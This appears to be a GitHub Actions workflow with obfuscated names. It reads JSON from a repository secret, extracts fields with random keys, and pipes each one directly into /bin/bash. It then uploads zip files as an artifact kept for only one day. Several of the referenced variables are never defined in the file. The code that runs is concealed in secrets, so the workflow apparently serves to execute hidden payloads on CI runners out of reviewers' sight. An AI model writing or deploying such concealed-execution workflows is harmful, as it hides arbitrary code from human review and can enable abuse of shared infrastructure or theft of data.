name: jiuzhelijun
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiuzhelijun
        env:
          j215: ${{ secrets.j215 }}
        run: |
          printf '%s' "$j215" | jq -r .mhxkt3538 | /bin/bash
          printf '%s' "$s19" | jq -r .kcpab21 | /bin/bash
          echo $ixp7 | jq -r .w124 | /bin/bash
          echo $nlx565 | jq -r .xdcw93916 | /bin/bash
          printf '%s' "$znfr905" | jq -r .girz8 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: j00TOAIk
          path: "*.zip"
          retention-days: 1
